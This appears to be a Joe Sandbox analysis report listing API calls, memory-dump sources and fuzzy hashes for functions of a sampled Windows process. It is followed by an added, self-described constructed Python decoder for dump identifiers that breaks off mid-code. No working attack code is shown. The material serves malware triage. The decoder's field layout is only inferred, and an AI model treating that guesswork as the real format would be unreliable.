• FreeLibrary.KERNEL32(00000000), ref: 00DBE763
Strings
Memory Dump Source
• Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
• Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: GetSystemWow64DirectoryW$X64
• API String ID: 145871493-2590602151
APIs
• RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00D655EB,SwapMouseButtons,00000004,?), ref: 00D6561C
• RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00D655EB,SwapMouseButtons,00000004,?), ref: 00D6563D
• RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00D655EB,SwapMouseButtons,00000004,?), ref: 00D6565F
Strings
Memory Dump Source
• Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
• Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID: Control Panel\Mouse
• API String ID: 3677997916-824357125
APIs
• GetFileAttributesW.KERNELBASE(?,00DFDC30), ref: 00DCDABB
• GetLastError.KERNEL32 ref: 00DCDACA
• CreateDirectoryW.KERNELBASE(?,00000000), ref: 00DCDAD9
• CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00DFDC30), ref: 00DCDB36
Memory Dump Source
• Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
• Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
Similarity
• API ID: CreateDirectory$AttributesErrorFileLast
• String ID:
• API String ID: 2267087916-0
APIs
• GetOpenFileNameW.COMDLG32(?), ref: 00DA4115
  • Part of subcall function 00D6557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D65558,?,?,00DA4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 00D6559E
  • Part of subcall function 00D639DE: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00D639FD
Strings
Memory Dump Source
• Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
• Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
Similarity
• API ID: Name$Path$FileFullLongOpen
• String ID: X$`u
• API String ID: 779396738-2693526198
APIs
• __CxxThrowException@8.LIBVCRUNTIME ref: 00D809F8
  • Part of subcall function 00D83634: RaiseException.KERNEL32(?,?,?,00D80A1A,?,00000000,?,?,?,?,?,?,00D80A1A,00000000,00E29758,00000000), ref: 00D83694
• __CxxThrowException@8.LIBVCRUNTIME ref: 00D80A15
Strings
Memory Dump Source
• Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
• Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
Similarity
• API ID: Exception@8Throw$ExceptionRaise
• String ID: Unknown exception
• API String ID: 3476068407-410509341
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
• Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
Similarity
• API ID: LocalTime
• String ID: %.3d$X64
• API String ID: 481472006-1077770165
APIs
• GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00DE8C52
• TerminateProcess.KERNEL32(00000000), ref: 00DE8C59
• FreeLibrary.KERNEL32(?,?,?,?), ref: 00DE8E3A
Memory Dump Source
• Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
• Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
Similarity
• API ID: Process$CurrentFreeLibraryTerminate
• String ID:
• API String ID: 146820519-0
APIs
• SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000001,?,00000000), ref: 00D66CA1
• SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001), ref: 00D66CB1
Memory Dump Source
• Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
• Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
APIs
  • Part of subcall function 00D65F59: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00D66049
• KillTimer.USER32(?,00000001,?,?), ref: 00D7FD44
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00D7FD53
• Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00DBFDD3
Memory Dump Source
• Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
• Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
Similarity
• API ID: IconNotifyShell_Timer$Kill
• String ID:
• API String ID: 3500052701-0
                                                                                              APIs
                                                                                              • CloseHandle.KERNELBASE(00000000,00000000,?,?,00D9895C,?,00E29CE8,0000000C), ref: 00D98A94
                                                                                              • GetLastError.KERNEL32(?,00D9895C,?,00E29CE8,0000000C), ref: 00D98A9E
                                                                                              • __dosmaperr.LIBCMT ref: 00D98AC9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseErrorHandleLast__dosmaperr
                                                                                              • String ID:
                                                                                              • API String ID: 2583163307-0
                                                                                              • Opcode ID: 8ccd5d201f60264de28630e48d0a21b2fb225256f4e732a0159c3b3f617ce7e8
                                                                                              • Instruction ID: d9f45b7730661d0414cfb4c479c5e76e82b941ab2bdb4a8f9955ab6bb7f4bb26
                                                                                              • Opcode Fuzzy Hash: 8ccd5d201f60264de28630e48d0a21b2fb225256f4e732a0159c3b3f617ce7e8
                                                                                              • Instruction Fuzzy Hash: DE012F326095505ADF1563B46885B7E67468B83F34F2D025EF915DB1D2DE60CC86A3B0
                                                                                              APIs
                                                                                              • SetFilePointerEx.KERNELBASE(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,00D997CA,FF8BC369,00000000,00000002,00000000), ref: 00D99754
                                                                                              • GetLastError.KERNEL32(?,00D997CA,FF8BC369,00000000,00000002,00000000,?,00D95EF1,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00D86F61), ref: 00D9975E
                                                                                              • __dosmaperr.LIBCMT ref: 00D99765
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFileLastPointer__dosmaperr
                                                                                              • String ID:
                                                                                              • API String ID: 2336955059-0
                                                                                              • Opcode ID: 23993eb68358ebd7d943796e5e5d6995f6b0716537e46029f7ee754ba23fd88d
                                                                                              • Instruction ID: e398c19fd57b0b3ec7f166d90d002a86ec6c45edfcdf18bcf1958a6860a359ce
                                                                                              • Opcode Fuzzy Hash: 23993eb68358ebd7d943796e5e5d6995f6b0716537e46029f7ee754ba23fd88d
                                                                                              • Instruction Fuzzy Hash: 2701D832620615ABCF059FE9DC55C6E7B2BDB85320B28025DF815DB291EA71DD41C7B0
                                                                                              APIs
                                                                                              • TranslateMessage.USER32(?), ref: 00D6F22B
                                                                                              • DispatchMessageW.USER32(?), ref: 00D6F239
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D6F24F
                                                                                              • Sleep.KERNELBASE(0000000A), ref: 00D6F261
                                                                                              • TranslateAcceleratorW.USER32(?,?,?), ref: 00DB327C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                                                              • String ID:
                                                                                              • API String ID: 3288985973-0
                                                                                              • Opcode ID: d44ebedb49e421b6fbeaa6e595a20eba19a789d07ea81812a0b5c3319c8b91ba
                                                                                              • Instruction ID: 2275ec27bb419b2c15c34d17fff81a452d55a200f6909a47d2c56a6a2bf166d9
                                                                                              • Opcode Fuzzy Hash: d44ebedb49e421b6fbeaa6e595a20eba19a789d07ea81812a0b5c3319c8b91ba
                                                                                              • Instruction Fuzzy Hash: 81F08231504341DBEB349B60DC49FEA73AEEB85300F004929F65AD71D0DB309548CB35
                                                                                              APIs
                                                                                              • __Init_thread_footer.LIBCMT ref: 00D72FB6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Init_thread_footer
                                                                                              • String ID: CALL
                                                                                              • API String ID: 1385522511-4196123274
                                                                                              • Opcode ID: aa5e40119138b7868ed4f50af389396e7c44c095cfd1ed11c133d4aec40e3a84
                                                                                              • Instruction ID: 7ff869146b7e63593884092964bca272ef3093c85ea85361c916996c52ee1dfc
                                                                                              • Opcode Fuzzy Hash: aa5e40119138b7868ed4f50af389396e7c44c095cfd1ed11c133d4aec40e3a84
                                                                                              • Instruction Fuzzy Hash: 6D225970608341DFC724DF14C484A6ABBE1FF98354F18895DF49A8B362E771E945CBA2
                                                                                              APIs
                                                                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00D633E9,00E32418,?,?,?,?,?,?,?,00D632EF,?), ref: 00D64227
                                                                                                • Part of subcall function 00D684B7: _wcslen.LIBCMT ref: 00D684CA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: FullNamePath_wcslen
                                                                                              • String ID: $
                                                                                              • API String ID: 4019309064-808236599
                                                                                              • Opcode ID: 5cbe4b46741cd556bcbe0ac254f1a6be6aa3d386604c0072292217b193db2e0d
                                                                                              • Instruction ID: 117758e07be70d8180a951efd3959a57ede7df51bed11b3ec5c9351f4279514d
                                                                                              • Opcode Fuzzy Hash: 5cbe4b46741cd556bcbe0ac254f1a6be6aa3d386604c0072292217b193db2e0d
                                                                                              • Instruction Fuzzy Hash: E111C431604208ABCB40EBA49806EED77BDEF4D350F104065B685E7291DE70E788DB75
                                                                                              APIs
                                                                                              • GetComputerNameW.KERNEL32(?,?), ref: 00DBE6F3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: ComputerName
                                                                                              • String ID: X64
                                                                                              • API String ID: 3545744682-893830106
                                                                                              • Opcode ID: 5ae92c6f5538a860a7e5d45e9716d544af43020e0001b60bec6d4de5060b0607
                                                                                              • Instruction ID: cc7c4df7b41d2185319fd2b4cffa1fae0a51ee19e9c10ee03ed196ca1eb86213
                                                                                              • Opcode Fuzzy Hash: 5ae92c6f5538a860a7e5d45e9716d544af43020e0001b60bec6d4de5060b0607
                                                                                              • Instruction Fuzzy Hash: A8D0C9B4805218EACB90CF80DC8CDED73BCBB18304F104895F147E2100D734E6489B70
                                                                                              APIs
                                                                                                • Part of subcall function 00D6557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D65558,?,?,00DA4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 00D6559E
                                                                                              • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00DD9665
                                                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00DD9673
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: PrivateProfileStringWrite$FullNamePath
                                                                                              • String ID:
                                                                                              • API String ID: 3876400906-0
                                                                                              • Opcode ID: b1f376827cf709b2f0d7131c61b00b9c6eae681cb094a8cc933023872813a79a
                                                                                              • Instruction ID: d9b80ba37e9df0b19664c3b9675196f95b006b7e752af4650ad5a5254281cb49
                                                                                              • Opcode Fuzzy Hash: b1f376827cf709b2f0d7131c61b00b9c6eae681cb094a8cc933023872813a79a
                                                                                              • Instruction Fuzzy Hash: 5011F979A006159FCB00EB64C85496EB7A5FF48364B058445F856AB362CB32FD41DBA0
                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00D63B33,?,00008000), ref: 00D66E80
                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,00D63B33,?,00008000), ref: 00DA59A2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: c78498ec649521f350c03551ba979ac0ea740255e89b6071cd3663fbe5ffcaf4
                                                                                              • Instruction ID: 3f5584593865438b5e59c5117f6ec5ced59b96c63b7d9d02dd5d3e8e0a15ff74
                                                                                              • Opcode Fuzzy Hash: c78498ec649521f350c03551ba979ac0ea740255e89b6071cd3663fbe5ffcaf4
                                                                                              • Instruction Fuzzy Hash: DB018031145321BBE3300A2ACC0EF977F99EF02770F14C214BEA8AA1E1C7B49854CBA0
                                                                                              APIs
                                                                                              • IsThemeActive.UXTHEME ref: 00D632C4
                                                                                                • Part of subcall function 00D6326D: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00D63282
                                                                                                • Part of subcall function 00D6326D: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00D63299
                                                                                                • Part of subcall function 00D63312: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00D632EF,?), ref: 00D63342
                                                                                                • Part of subcall function 00D63312: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00D632EF,?), ref: 00D63355
                                                                                                • Part of subcall function 00D63312: GetFullPathNameW.KERNEL32(00007FFF,?,?,00E32418,00E32400,?,?,?,?,?,?,00D632EF,?), ref: 00D633C1
                                                                                                • Part of subcall function 00D63312: SetCurrentDirectoryW.KERNELBASE(?,00000001,00E32418,?,?,?,?,?,?,?,00D632EF,?), ref: 00D63442
                                                                                              • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00D632FE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                                                              • String ID:
                                                                                              • API String ID: 1550534281-0
                                                                                              • Opcode ID: e33f8f83c3baa78d584e80d3e06826ef2a4b7ba6550ecb7119a11df8be0abb6a
                                                                                              • Instruction ID: 5cb94bc11f9f0e997ee02397ae7e42dc2e31c636375288e236d0113a57da607a
                                                                                              • Opcode Fuzzy Hash: e33f8f83c3baa78d584e80d3e06826ef2a4b7ba6550ecb7119a11df8be0abb6a
                                                                                              • Instruction Fuzzy Hash: 5DF030715543499FE300AF71FC0EB643FA1E705705F244409F249A62E2CBB985588B30
                                                                                              APIs
                                                                                              • timeGetTime.WINMM ref: 00D7F97A
                                                                                                • Part of subcall function 00D6EE07: GetInputState.USER32 ref: 00D6EEB7
                                                                                              • Sleep.KERNEL32(00000000), ref: 00DBFAC2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: InputSleepStateTimetime
                                                                                              • String ID:
                                                                                              • API String ID: 4149333218-0
                                                                                              • Opcode ID: 406bcad2e6cd6a4a36da37d01d75e4e54ad237f9c8a6810b85caa1f8d3a18a23
                                                                                              • Instruction ID: 6eec35448d468e609aba0bac5d0c4055bd5c4a62a503780848830735e7844599
                                                                                              • Opcode Fuzzy Hash: 406bcad2e6cd6a4a36da37d01d75e4e54ad237f9c8a6810b85caa1f8d3a18a23
                                                                                              • Instruction Fuzzy Hash: C6F082712407059FC314EB69D805B6AB7E6FF44351F00402AE49EC7350DB70A810CBB1
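The Memory Dump Source identifiers listed for each function pack the region's base address, page protection and region type into the .sdmp file name, which is what tells a reader whether a fuzzy-hashed function lives in image-backed executable memory or in an injected private region. The decoder below is an added example, not part of the Joe Sandbox report or its tooling; the field layout it assumes (process index, dump stage, dump id, base address, protection, state, region type, sequence) is inferred from the identifiers on this page, while the PAGE_* and MEM_* values are the documented Windows constants from winnt.h. The input is a constructed list of the six regions shown above for process 8.

```python
"""Decode Joe Sandbox-style .sdmp memory-dump identifiers.

Constructed example. The field layout is an assumption inferred from the
identifiers in the report; only the Windows PAGE_* and MEM_* constants are
authoritative.
"""
import re
from dataclasses import dataclass

# Windows page-protection constants (winnt.h) - authoritative values.
PAGE_FLAGS = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
# MEMORY_BASIC_INFORMATION.Type values - authoritative.
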